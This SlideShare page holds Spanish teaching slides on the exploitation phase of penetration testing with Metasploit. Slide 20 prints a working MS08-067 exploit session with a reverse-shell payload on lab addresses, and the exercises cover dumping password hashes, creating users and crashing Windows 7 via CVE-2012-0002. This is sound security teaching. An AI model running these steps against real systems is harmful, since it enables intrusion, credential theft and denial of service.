SlideShare una empresa de Scribd logo

Sad tema2 pen_test_iii

Test de Intrusión, test de pentración, pentest,

1 de 23
Descargar para leer sin conexión
Seguridad y Alta Disponibilidad:
Test de intrusión (III): explotación de vulnerabilidades




                                     Jesús Moreno León

                                     jesus.moreno.edu@
                                     juntadeandalucía.es

                                      Septiembre 2012
© Jesús Moreno León, Septiembre de 2012

                              Algunos derechos reservados.
                 Este artículo se distribuye bajo la licencia
“Reconocimiento-CompartirIgual 3.0 España" de Creative
                                   Commons, disponible en
http://creativecommons.org/licenses/by-sa/3.0/es/deed.es


                      Este documento (o uno muy similar)
                     está disponible en (o enlazado desde)
                    http://informatica.gonzalonazareno.org
Exploits

Cuando se han encontrado los bugs, el objetivo es crear una
herramienta que saque partido de ellos, es decir, que sea capaz
de hacer uso de esa “funcionalidad no definida del programa”.
Para ello, se analizan las posibilidades y alcance de ese bug y se
opta por un determinado exploit, que es, precisamente, un
código escrito con el fin de aprovechar un bug para obtener
diversos privilegios.
Todos los exploits tienen dos partes diferenciadas:
●
    La cabecera, que es lo que se denomina exploit puramente y
    que depende de cada bug
●
    El cuerpo, denominado payload que son acciones ya
    programadas que se reutilizan entre los diferentes exploits
Búsqueda de exploits

El número de vulnerabilidades que se publican diariamente es
altísimo. Sin embargo, el número de exploits que se ponen
disponibles no iguala ni por asomo al de vulnerabilidades
Frameworks como Metasploit son una herramienta básica para
todo pentester, pero no contiene todos los exploits disponibles,
ya que, por ejemplo, muchos exploits sólo se incluyen en
frameworks comerciales, como Canvas de Immunity, ya que son
desarrollados con sus equipos de exploiters y no son públicos
Una buena base de datos es la de http://www.cvedetails.com

                                            Fuente: Seguridad Apple
                         http://www.seguridadapple.com/2012/10/cve-
                                  details-buscar-exploits-para.html
CVEDetails
CVEDetails

Recomendados

Test de intrusión (I): intelligence gathering
Test de intrusión (I): intelligence gatheringTest de intrusión (I): intelligence gathering
Test de intrusión (I): intelligence gatheringJesús Moreno León
 
Actividad No. 6.3: Escaneo de vulnerabilidades con Nessus
Actividad No. 6.3: Escaneo de vulnerabilidades con NessusActividad No. 6.3: Escaneo de vulnerabilidades con Nessus
Actividad No. 6.3: Escaneo de vulnerabilidades con NessusFrancisco Medina
 
Informe proyecto nessus
Informe proyecto nessusInforme proyecto nessus
Informe proyecto nessusLethy Mendez
 
Webinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkWebinar Gratuito: Metasploit Framework
Webinar Gratuito: Metasploit FrameworkAlonso Caballero
 
Actividad No. 2.4- Ataque contra contraseñas de sistemas Linux
Actividad No. 2.4- Ataque contra contraseñas de sistemas LinuxActividad No. 2.4- Ataque contra contraseñas de sistemas Linux
Actividad No. 2.4- Ataque contra contraseñas de sistemas LinuxFrancisco Medina
 
Actividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortActividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortFrancisco Medina
 
Actividad Final: Instalación del LMS Moodle en CentOS con el módulo SELinux h...
Actividad Final: Instalación del LMS Moodle en CentOS con el módulo SELinux h...Actividad Final: Instalación del LMS Moodle en CentOS con el módulo SELinux h...
Actividad Final: Instalación del LMS Moodle en CentOS con el módulo SELinux h...Francisco Medina
 
Actividad No. 1.10 Análisis de vulnerabilidades con VEGA en Kali Linux
Actividad No. 1.10 Análisis de vulnerabilidades con VEGA en Kali LinuxActividad No. 1.10 Análisis de vulnerabilidades con VEGA en Kali Linux
Actividad No. 1.10 Análisis de vulnerabilidades con VEGA en Kali LinuxFrancisco Medina
 

Más contenido relacionado

La actualidad más candente

Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Francisco Medina
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
 
Proteccion a la base de datos
Proteccion a la base de datosProteccion a la base de datos
Proteccion a la base de datosSergio Olivares
 
Webinar Gratuito "OpenVAS"
Webinar Gratuito "OpenVAS"Webinar Gratuito "OpenVAS"
Webinar Gratuito "OpenVAS"Alonso Caballero
 
ShellCon 2018: Hacking con Python
ShellCon 2018: Hacking con PythonShellCon 2018: Hacking con Python
ShellCon 2018: Hacking con PythonDani Adastra
 
Webinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses BásicasWebinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses BásicasAlonso Caballero
 
Introducción a Kali Linux
Introducción a Kali LinuxIntroducción a Kali Linux
Introducción a Kali LinuxFrancisco Medina
 
CONEXIÓN A MySQL EN .NET
CONEXIÓN A MySQL EN .NETCONEXIÓN A MySQL EN .NET
CONEXIÓN A MySQL EN .NETRoberto Salas
 
Proyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unixProyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unixFrancisco Medina
 
1. introduccioìn a la seguridad
1. introduccioìn a la seguridad1. introduccioìn a la seguridad
1. introduccioìn a la seguridad1 2d
 
Carta temas practica1
Carta temas practica1Carta temas practica1
Carta temas practica1A B
 

La actualidad más candente (16)

Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
 
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxActividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
 
Proteccion a la base de datos
Proteccion a la base de datosProteccion a la base de datos
Proteccion a la base de datos
 
Webinar Gratuito "OpenVAS"
Webinar Gratuito "OpenVAS"Webinar Gratuito "OpenVAS"
Webinar Gratuito "OpenVAS"
 
ShellCon 2018: Hacking con Python
ShellCon 2018: Hacking con PythonShellCon 2018: Hacking con Python
ShellCon 2018: Hacking con Python
 
Los navegadores CYD
Los navegadores CYDLos navegadores CYD
Los navegadores CYD
 
Webinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses BásicasWebinar Gratuito: Técnicas Antiforenses Básicas
Webinar Gratuito: Técnicas Antiforenses Básicas
 
Introducción a Kali Linux
Introducción a Kali LinuxIntroducción a Kali Linux
Introducción a Kali Linux
 
CONEXIÓN A MySQL EN .NET
CONEXIÓN A MySQL EN .NETCONEXIÓN A MySQL EN .NET
CONEXIÓN A MySQL EN .NET
 
Proyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unixProyecto final administración y seguridad en linux y unix
Proyecto final administración y seguridad en linux y unix
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
1. introduccioìn a la seguridad
1. introduccioìn a la seguridad1. introduccioìn a la seguridad
1. introduccioìn a la seguridad
 
Articulo ieee ataque_i
Articulo ieee ataque_iArticulo ieee ataque_i
Articulo ieee ataque_i
 
DPRN3_U3_A1_RADO
DPRN3_U3_A1_RADODPRN3_U3_A1_RADO
DPRN3_U3_A1_RADO
 
Webinar Gratuito: OpenVAS
Webinar Gratuito: OpenVASWebinar Gratuito: OpenVAS
Webinar Gratuito: OpenVAS
 
Carta temas practica1
Carta temas practica1Carta temas practica1
Carta temas practica1
 

Similar a Sad tema2 pen_test_iii

Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitYare LoZada
 
Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitSaMoCaFlo
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Adrián Lois
 
Seguridad En Sistemas Operativos (segunda parte)
Seguridad En Sistemas Operativos (segunda parte)Seguridad En Sistemas Operativos (segunda parte)
Seguridad En Sistemas Operativos (segunda parte)Sebastián Bortnik
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Test de intrusión
Test de intrusiónTest de intrusión
Test de intrusiónnoc_313
 
Pruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit FrameworkPruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit FrameworkErlaitzParreoMuoz
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01Tensor
 
Jade 1 Agents principios básicos
Jade 1 Agents principios básicosJade 1 Agents principios básicos
Jade 1 Agents principios básicosOctavio Abundez
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxHectorDeJesusTapiaGo
 
Que son las_vulnerabilidades_del_-software
Que son las_vulnerabilidades_del_-softwareQue son las_vulnerabilidades_del_-software
Que son las_vulnerabilidades_del_-softwareEstebanGonzalez153
 
Ingenieria inversa del software (ii) la logica
Ingenieria inversa del software (ii)   la logicaIngenieria inversa del software (ii)   la logica
Ingenieria inversa del software (ii) la logicaUnPocoDeTodoPeru
 

Similar a Sad tema2 pen_test_iii (20)

VC4NM73-EQ#6-EXPLOIT
VC4NM73-EQ#6-EXPLOITVC4NM73-EQ#6-EXPLOIT
VC4NM73-EQ#6-EXPLOIT
 
Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploit
 
Test de intrusion
Test de intrusionTest de intrusion
Test de intrusion
 
Vc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploitVc4 nm73 equipo#6-exploit
Vc4 nm73 equipo#6-exploit
 
Sad tema2 pen_test_ii
Sad tema2 pen_test_iiSad tema2 pen_test_ii
Sad tema2 pen_test_ii
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]
 
Cpods training-metasploit
Cpods training-metasploitCpods training-metasploit
Cpods training-metasploit
 
Metasploit v0.5
Metasploit v0.5Metasploit v0.5
Metasploit v0.5
 
Curso de Metasploit
Curso de MetasploitCurso de Metasploit
Curso de Metasploit
 
Seguridad En Sistemas Operativos (segunda parte)
Seguridad En Sistemas Operativos (segunda parte)Seguridad En Sistemas Operativos (segunda parte)
Seguridad En Sistemas Operativos (segunda parte)
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Test de intrusión
Test de intrusiónTest de intrusión
Test de intrusión
 
Pruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit FrameworkPruebas de intrusion mediante Metasploit Framework
Pruebas de intrusion mediante Metasploit Framework
 
Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Jade 1 Agents principios básicos
Jade 1 Agents principios básicosJade 1 Agents principios básicos
Jade 1 Agents principios básicos
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptx
 
Que son las_vulnerabilidades_del_-software
Que son las_vulnerabilidades_del_-softwareQue son las_vulnerabilidades_del_-software
Que son las_vulnerabilidades_del_-software
 
Ingenieria inversa del software (ii) la logica
Ingenieria inversa del software (ii)   la logicaIngenieria inversa del software (ii)   la logica
Ingenieria inversa del software (ii) la logica
 
Métodos vulnerabilidad activos
Métodos vulnerabilidad activosMétodos vulnerabilidad activos
Métodos vulnerabilidad activos
 
tehnik mobile hacking
tehnik mobile hackingtehnik mobile hacking
tehnik mobile hacking
 

Más de Jesús Moreno León

Pensamiento computacional e inteligencia artificial en la educación
Pensamiento computacional e inteligencia artificial en la educaciónPensamiento computacional e inteligencia artificial en la educación
Pensamiento computacional e inteligencia artificial en la educaciónJesús Moreno León
 
Investigación sobre el desarrollo del pensamiento computacional en la escuela
Investigación sobre el desarrollo del pensamiento computacional en la escuelaInvestigación sobre el desarrollo del pensamiento computacional en la escuela
Investigación sobre el desarrollo del pensamiento computacional en la escuelaJesús Moreno León
 
Tecnología educativa en infantil
Tecnología educativa en infantilTecnología educativa en infantil
Tecnología educativa en infantilJesús Moreno León
 
Programación y robótica en la escuela. ¿Un juego de niños pasajero?
Programación y robótica en la escuela. ¿Un juego de niños pasajero?Programación y robótica en la escuela. ¿Un juego de niños pasajero?
Programación y robótica en la escuela. ¿Un juego de niños pasajero?Jesús Moreno León
 
On the development of computational thinking skills in schools through comput...
On the development of computational thinking skills in schools through comput...On the development of computational thinking skills in schools through comput...
On the development of computational thinking skills in schools through comput...Jesús Moreno León
 
Assessing computational thinking with tools in the classroom
Assessing computational thinking with tools in the classroomAssessing computational thinking with tools in the classroom
Assessing computational thinking with tools in the classroomJesús Moreno León
 
On the quest for assessing computational thinking
On the quest for assessing computational thinkingOn the quest for assessing computational thinking
On the quest for assessing computational thinkingJesús Moreno León
 
Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...
Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...
Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...Jesús Moreno León
 
El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...
El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...
El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...Jesús Moreno León
 
How social are Scratch learners? A comprehensive analysis of the Scratch plat...
How social are Scratch learners? A comprehensive analysis of the Scratch plat...How social are Scratch learners? A comprehensive analysis of the Scratch plat...
How social are Scratch learners? A comprehensive analysis of the Scratch plat...Jesús Moreno León
 
Code to Learn with Scratch? A systematic literature review
Code to Learn with Scratch? A systematic literature reviewCode to Learn with Scratch? A systematic literature review
Code to Learn with Scratch? A systematic literature reviewJesús Moreno León
 
La programación informática como vía de emprendimiento. Programamos.
La programación informática como vía de emprendimiento. Programamos.La programación informática como vía de emprendimiento. Programamos.
La programación informática como vía de emprendimiento. Programamos.Jesús Moreno León
 
Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...
Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...
Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...Jesús Moreno León
 
Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...
Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...
Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...Jesús Moreno León
 
Analyze your Scratch projects with Dr. Scratch and assess your Computational ...
Analyze your Scratch projects with Dr. Scratch and assess your Computational ...Analyze your Scratch projects with Dr. Scratch and assess your Computational ...
Analyze your Scratch projects with Dr. Scratch and assess your Computational ...Jesús Moreno León
 
La programación informática y el desarrollo del pensamiento computacional en ...
La programación informática y el desarrollo del pensamiento computacional en ...La programación informática y el desarrollo del pensamiento computacional en ...
La programación informática y el desarrollo del pensamiento computacional en ...Jesús Moreno León
 
Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...
Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...
Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...Jesús Moreno León
 
The Europe Code Week (CodeEU) initiative
The Europe Code Week (CodeEU) initiativeThe Europe Code Week (CodeEU) initiative
The Europe Code Week (CodeEU) initiativeJesús Moreno León
 
Computer Programming as an Educational Tool in the English Classroom: a preli...
Computer Programming as an Educational Tool in the English Classroom: a preli...Computer Programming as an Educational Tool in the English Classroom: a preli...
Computer Programming as an Educational Tool in the English Classroom: a preli...Jesús Moreno León
 

Más de Jesús Moreno León (20)

Pensamiento computacional e inteligencia artificial en la educación
Pensamiento computacional e inteligencia artificial en la educaciónPensamiento computacional e inteligencia artificial en la educación
Pensamiento computacional e inteligencia artificial en la educación
 
Investigación sobre el desarrollo del pensamiento computacional en la escuela
Investigación sobre el desarrollo del pensamiento computacional en la escuelaInvestigación sobre el desarrollo del pensamiento computacional en la escuela
Investigación sobre el desarrollo del pensamiento computacional en la escuela
 
Tecnología educativa en infantil
Tecnología educativa en infantilTecnología educativa en infantil
Tecnología educativa en infantil
 
Programación y robótica en la escuela. ¿Un juego de niños pasajero?
Programación y robótica en la escuela. ¿Un juego de niños pasajero?Programación y robótica en la escuela. ¿Un juego de niños pasajero?
Programación y robótica en la escuela. ¿Un juego de niños pasajero?
 
On the development of computational thinking skills in schools through comput...
On the development of computational thinking skills in schools through comput...On the development of computational thinking skills in schools through comput...
On the development of computational thinking skills in schools through comput...
 
Assessing computational thinking with tools in the classroom
Assessing computational thinking with tools in the classroomAssessing computational thinking with tools in the classroom
Assessing computational thinking with tools in the classroom
 
On the quest for assessing computational thinking
On the quest for assessing computational thinkingOn the quest for assessing computational thinking
On the quest for assessing computational thinking
 
Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...
Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...
Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...
 
El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...
El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...
El repositorio de proyectos Scratch. Nuevas oportunidades de investigación y ...
 
Code to learn in k-12?
Code to learn in k-12?Code to learn in k-12?
Code to learn in k-12?
 
How social are Scratch learners? A comprehensive analysis of the Scratch plat...
How social are Scratch learners? A comprehensive analysis of the Scratch plat...How social are Scratch learners? A comprehensive analysis of the Scratch plat...
How social are Scratch learners? A comprehensive analysis of the Scratch plat...
 
Code to Learn with Scratch? A systematic literature review
Code to Learn with Scratch? A systematic literature reviewCode to Learn with Scratch? A systematic literature review
Code to Learn with Scratch? A systematic literature review
 
La programación informática como vía de emprendimiento. Programamos.
La programación informática como vía de emprendimiento. Programamos.La programación informática como vía de emprendimiento. Programamos.
La programación informática como vía de emprendimiento. Programamos.
 
Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...
Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...
Dr. Scratch, una herramienta de asistencia al docente en la evaluación de pro...
 
Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...
Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...
Developing Mathematical Thinking with Scratch: An Experiment with 6th Grade S...
 
Analyze your Scratch projects with Dr. Scratch and assess your Computational ...
Analyze your Scratch projects with Dr. Scratch and assess your Computational ...Analyze your Scratch projects with Dr. Scratch and assess your Computational ...
Analyze your Scratch projects with Dr. Scratch and assess your Computational ...
 
La programación informática y el desarrollo del pensamiento computacional en ...
La programación informática y el desarrollo del pensamiento computacional en ...La programación informática y el desarrollo del pensamiento computacional en ...
La programación informática y el desarrollo del pensamiento computacional en ...
 
Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...
Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...
Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...
 
The Europe Code Week (CodeEU) initiative
The Europe Code Week (CodeEU) initiativeThe Europe Code Week (CodeEU) initiative
The Europe Code Week (CodeEU) initiative
 
Computer Programming as an Educational Tool in the English Classroom: a preli...
Computer Programming as an Educational Tool in the English Classroom: a preli...Computer Programming as an Educational Tool in the English Classroom: a preli...
Computer Programming as an Educational Tool in the English Classroom: a preli...
 

Sad tema2 pen_test_iii

  • 1. Seguridad y Alta Disponibilidad: Test de intrusión (III): explotación de vulnerabilidades Jesús Moreno León jesus.moreno.edu@ juntadeandalucía.es Septiembre 2012
  • 2. © Jesús Moreno León, Septiembre de 2012 Algunos derechos reservados. Este artículo se distribuye bajo la licencia “Reconocimiento-CompartirIgual 3.0 España" de Creative Commons, disponible en http://creativecommons.org/licenses/by-sa/3.0/es/deed.es Este documento (o uno muy similar) está disponible en (o enlazado desde) http://informatica.gonzalonazareno.org
  • 3. Exploits Cuando se han encontrado los bugs, el objetivo es crear una herramienta que saque partido de ellos, es decir, que sea capaz de hacer uso de esa “funcionalidad no definida del programa”. Para ello, se analizan las posibilidades y alcance de ese bug y se opta por un determinado exploit, que es, precisamente, un código escrito con el fin de aprovechar un bug para obtener diversos privilegios. Todos los exploits tienen dos partes diferenciadas: ● La cabecera, que es lo que se denomina exploit puramente y que depende de cada bug ● El cuerpo, denominado payload que son acciones ya programadas que se reutilizan entre los diferentes exploits
  • 4. Búsqueda de exploits El número de vulnerabilidades que se publican diariamente es altísimo. Sin embargo, el número de exploits que se ponen disponibles no iguala ni por asomo al de vulnerabilidades Frameworks como Metasploit son una herramienta básica para todo pentester, pero no contiene todos los exploits disponibles, ya que, por ejemplo, muchos exploits sólo se incluyen en frameworks comerciales, como Canvas de Immunity, ya que son desarrollados con sus equipos de exploiters y no son públicos Una buena base de datos es la de http://www.cvedetails.com Fuente: Seguridad Apple http://www.seguridadapple.com/2012/10/cve- details-buscar-exploits-para.html
  • 7. Explotando los bugs Metasploit es una herramienta que aúna una base de datos de cabeceras de exploits y de payloads. Se usa por profesionales de la seguridad informática para realizar Pentests, administradores de sistemas para verificar la instalación de parches e investigadores de todo el mundo para realizar pruebas. http://www.metasploit.com/
  • 8. Metasploit Express La versión Express es de pago y no es más que un front-end para el framework Metasploit que incorpora funcionalidades que automatizan el proceso de un test de intrusión y permite generar informes con los resultados. Pasos a seguir: 1. Crear un proyecto 2. Descubrir dispositivos 3, Conseguir acceso a los equipos 4. Tomar el control de una sesión 5. Recoger datos de las máquinas atacadas 6. Limpiar la sesión 7. Generar un informe
  • 9. Metasploit Express Veamos los pasos a seguir para conseguir una sesión en este equipo, que es un Windows XP en el que un usuario está navegando por Internet
  • 19. Metasploit Framework Este framework incluye herramientas, bibliotecas, módulos y una interfaz de usuario. La funcionalidad básica es un lanzador de módulos que permite al usuario configurar un exploit y lanzarlo contra un equipo objetivo. Si el exploit tiene éxito, se ejecuta el payload en el objetivo y se le facilita al usuario una shell para interactuar con el payload. http://www.elladodelmal.com/2010/07/metasploit-con-adobe-flash-player-un.html
  • 20. Metasploit Framework ¿Cómo se configuran y se lanzan los exploits con el framework? msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi)> set RHOST X.X.X.X RHOST => 192.168.56.101 msf exploit(ms08_067_netapi)> set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ms08_067_netapi) > set LHOST Y.Y.Y.Y LHOST => 192.168.56.1 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.56.1:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 – lang:Spanish [*] Selected Target: Windows XP SP3 Spanish (NX) [*] Attempting to trigger the vulnerability... Microsoft Windows XP [Versi?n 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32>
  • 21. Metasploit Framework ● Práctica 1: aprovechando la misma vulnerabilidad y usando el mismo exploit, utiliza el payload meterpreter e investiga todas las posibilidades que te ofrece una vez conseguida una sesión en la máquina objetivo: ● Subir ficheros ● Ejecutar programas ● Descargar ficheros ● Activar el acceso remoto ● Crear usuarios ● Copiar las hashes de las passwords ● ...
  • 22. Metasploit Framework ● Práctica 2: DOS a Windows 7, a través de una versión no actualizada del escritorio remoto CVE-2012-0002 1. Localizar exploit 2. Configurar exploit 3. Lanzar exploit 4. Pantallazo azul
  • 23. Más información ● Estas diapositivas están basadas en el curso Pentesting con Metasploit Framework, impartido por Pablo González de Informática 64. ● http://www.flu-project.com ● http://www.seguridadapple.com ● www.elladodelmal.com/